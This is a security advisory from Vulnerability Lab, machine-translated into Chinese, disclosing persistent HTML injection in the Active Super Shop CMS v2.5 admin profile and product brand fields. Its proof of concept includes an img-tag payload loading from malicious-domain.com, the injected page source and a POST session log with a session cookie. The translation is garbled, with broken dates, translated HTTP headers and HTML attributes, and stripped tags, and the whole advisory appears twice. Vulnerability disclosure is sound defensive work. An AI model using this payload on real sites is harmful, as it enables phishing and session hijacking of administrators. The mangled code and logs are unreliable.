#利用标题:活动超级商店CMS v2.5 -HTML注射漏洞
参考(来源): https://www.vulnerability-lab.com/get_content.php?id=2278
发布日期:
2023-07-04
脆弱性实验室ID(VL-ID): 2278
常见漏洞评分系统: 5.4
产品服务简介:
========================================
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在活跃的超级商店多供应商CMS v2.5 Web应用程序中发现了多个HTML注入漏洞。
受影响的产品:
============================
活性区
Product: Active Super Shop CMS v2.5(CMS)(Web-application)
漏洞披露时间表:
============================================
2021-08-203360研究人员通知协调(安全研究人员)
2021-08-213360供应商通知(安全部门)
2021 - ** - ** :供应商响应/反馈(安全部门)
2021 - ** - ** :供应商FIX/PATCH(服务开发人员团队)
2021 - ** - ** :安全性确认(安全部门)
2023-07-05:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的Active Super Shop多供应商CMS v2.5 Web应用程序中发现了多个HTML注入Web漏洞。
Web漏洞使远程攻击者可以将自己的HTML代码注入持久向量以操纵应用程序内容。
持续的HTML注入Web漏洞位于管理资料和产品品牌模块的名称,电话和地址参数中。
具有特权会计师访问权限的远程攻击者能够在名称中注入自己的恶意脚本代码,以引发持续执行
个人资料视图或产品预览列表。有3种不同的特权允许访问后端,例如会计师(低特权),
经理(中等特权)或管理员(高特权)。会计师能够在预览中攻击管理员和经理的较高特权访问角色
后端中损害应用程序的元素。注入的请求方法是邮政,攻击向量位于应用程序侧的持久性。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持续的外部重定向到恶意来源和
对受影响的应用模块的持续操纵。
请求方法:
[+]帖子
弱势模块:
[+]管理详细信息
脆弱参数:
[+]名称
[+]电话
[+]地址
受影响的模块:
[+]管理配置文件
[+]产品品牌
概念证明(POC):
================================
HTML注入Web漏洞可以由具有特权会计师访问权限且用户交互较低的远程攻击者利用。
为了进行安全示范或复制持续的跨站点网络漏洞,遵循以下提供的信息和步骤继续进行。
利用:有效载荷
img src='https://[域]/[path]/[图片]。*'
脆弱的来源: Manage_admin品牌
div class='tab-pane vade在'id=''style='border:1px实心#ebebb; Border-Radius:4px;'
div类='面板头'
H3 class='面板标题'管理详细信息/H3
/div
表单操作='https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/update_profile/'class='form-horizontal'method='
DIV类='面板体'
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-1'name/label
DIV类='Col-SM-6'
输入类型='text'name='name'value='mr。 Accountant'img src='https://malicious-domain.com/gfx/logo-header.png''id='demo-hor-1'class='表格控制所需
/div/div
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-2'email/label
DIV类='Col-SM-6'
输入类型='email'name='email'value='[email protected]'id='demo-hor-2'class='表格控制'
/div/div
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-3'
电话/标签
DIV类='Col-SM-6'
输入类型='text'name='phone'value='017'img src='https://malicious-domain.com/gfx/logo-header.png''id='demo-hor-3'class='form-control'
/div/div
--- POC会话日志(POST)---
https://ASSM_CMS.LOCALHOST3:8080/shop/admin/manage/manage_admin/update_profile/
host: assm_cms.localhost:8080
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:91.0)Gecko/20100101 Firefox/91.0
ACCEPT: TEXT/HTML, /; Q=0.01
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=---------------------------------- 280242453224137385302547344680
内容长度: 902
Origin:https://ASSM_CMS.LOCALHOST:8080
Connection:保持空白
Referer:https://ASSM_CMS.localHost:8080/shop/admin/admin/manage/manage_admin/
cookie: ci_session=5N6FMO5Q5GVIK6I5HH2B72UONUEM9AV3; Curr=1
-
POST: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
ci_session=5N6FMO5Q5GVIK6I5HH2B72UONUEM9AV3;路径=/; httponly
https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/
host: assm_cms.localhost:8080
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:91.0)Gecko/20100101 Firefox/91.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
Connection:保持空白
参考文献:
https://ASSM_CMS.LOCALHOST:8080/shop/
https://ASSM_CMS.LOCALHOST:8080/shop/admin/
https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/
https://ASSM_CMS.LOCALHOST3:8080/shop/admin/manage/manage_admin/update_profile/
解决方案- 修复补丁:
================================
禁止将HTML代码插入输入字段,例如名称,地址和电话。消毒内容以确保交付。
安全风险:
===================
购物网络应用中HTML注入Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab
参考(来源): https://www.vulnerability-lab.com/get_content.php?id=2278
发布日期:
2023-07-04
脆弱性实验室ID(VL-ID): 2278
常见漏洞评分系统: 5.4
产品服务简介:
========================================
正在加载...
codecanyon.net
======================================
脆弱性实验室核心研究团队在活跃的超级商店多供应商CMS v2.5 Web应用程序中发现了多个HTML注入漏洞。
受影响的产品:
============================
活性区
Product: Active Super Shop CMS v2.5(CMS)(Web-application)
漏洞披露时间表:
============================================
2021-08-203360研究人员通知协调(安全研究人员)
2021-08-213360供应商通知(安全部门)
2021 - ** - ** :供应商响应/反馈(安全部门)
2021 - ** - ** :供应商FIX/PATCH(服务开发人员团队)
2021 - ** - ** :安全性确认(安全部门)
2023-07-05:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方的Active Super Shop多供应商CMS v2.5 Web应用程序中发现了多个HTML注入Web漏洞。
Web漏洞使远程攻击者可以将自己的HTML代码注入持久向量以操纵应用程序内容。
持续的HTML注入Web漏洞位于管理资料和产品品牌模块的名称,电话和地址参数中。
具有特权会计师访问权限的远程攻击者能够在名称中注入自己的恶意脚本代码,以引发持续执行
个人资料视图或产品预览列表。有3种不同的特权允许访问后端,例如会计师(低特权),
经理(中等特权)或管理员(高特权)。会计师能够在预览中攻击管理员和经理的较高特权访问角色
后端中损害应用程序的元素。注入的请求方法是邮政,攻击向量位于应用程序侧的持久性。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持续的外部重定向到恶意来源和
对受影响的应用模块的持续操纵。
请求方法:
[+]帖子
弱势模块:
[+]管理详细信息
脆弱参数:
[+]名称
[+]电话
[+]地址
受影响的模块:
[+]管理配置文件
[+]产品品牌
概念证明(POC):
================================
HTML注入Web漏洞可以由具有特权会计师访问权限且用户交互较低的远程攻击者利用。
为了进行安全示范或复制持续的跨站点网络漏洞,遵循以下提供的信息和步骤继续进行。
利用:有效载荷
img src='https://[域]/[path]/[图片]。*'
脆弱的来源: Manage_admin品牌
div class='tab-pane vade在'id=''style='border:1px实心#ebebb; Border-Radius:4px;'
div类='面板头'
H3 class='面板标题'管理详细信息/H3
/div
表单操作='https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/update_profile/'class='form-horizontal'method='
DIV类='面板体'
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-1'name/label
DIV类='Col-SM-6'
输入类型='text'name='name'value='mr。 Accountant'img src='https://malicious-domain.com/gfx/logo-header.png''id='demo-hor-1'class='表格控制所需
/div/div
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-2'email/label
DIV类='Col-SM-6'
输入类型='email'name='email'value='[email protected]'id='demo-hor-2'class='表格控制'
/div/div
div类='form-group'
标签class='col-sm-3控制标签'for='demo-hor-3'
电话/标签
DIV类='Col-SM-6'
输入类型='text'name='phone'value='017'img src='https://malicious-domain.com/gfx/logo-header.png''id='demo-hor-3'class='form-control'
/div/div
--- POC会话日志(POST)---
https://ASSM_CMS.LOCALHOST3:8080/shop/admin/manage/manage_admin/update_profile/
host: assm_cms.localhost:8080
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:91.0)Gecko/20100101 Firefox/91.0
ACCEPT: TEXT/HTML, /; Q=0.01
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=---------------------------------- 280242453224137385302547344680
内容长度: 902
Origin:https://ASSM_CMS.LOCALHOST:8080
Connection:保持空白
Referer:https://ASSM_CMS.localHost:8080/shop/admin/admin/manage/manage_admin/
cookie: ci_session=5N6FMO5Q5GVIK6I5HH2B72UONUEM9AV3; Curr=1
-
POST: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
ci_session=5N6FMO5Q5GVIK6I5HH2B72UONUEM9AV3;路径=/; httponly
https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/
host: assm_cms.localhost:8080
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:91.0)Gecko/20100101 Firefox/91.0
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
Connection:保持空白
参考文献:
https://ASSM_CMS.LOCALHOST:8080/shop/
https://ASSM_CMS.LOCALHOST:8080/shop/admin/
https://ASSM_CMS.LOCALHOST:8080/shop/admin/admin/manage_admin/
https://ASSM_CMS.LOCALHOST3:8080/shop/admin/manage/manage_admin/update_profile/
解决方案- 修复补丁:
================================
禁止将HTML代码插入输入字段,例如名称,地址和电话。消毒内容以确保交付。
安全风险:
===================
购物网络应用中HTML注入Web漏洞的安全风险估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab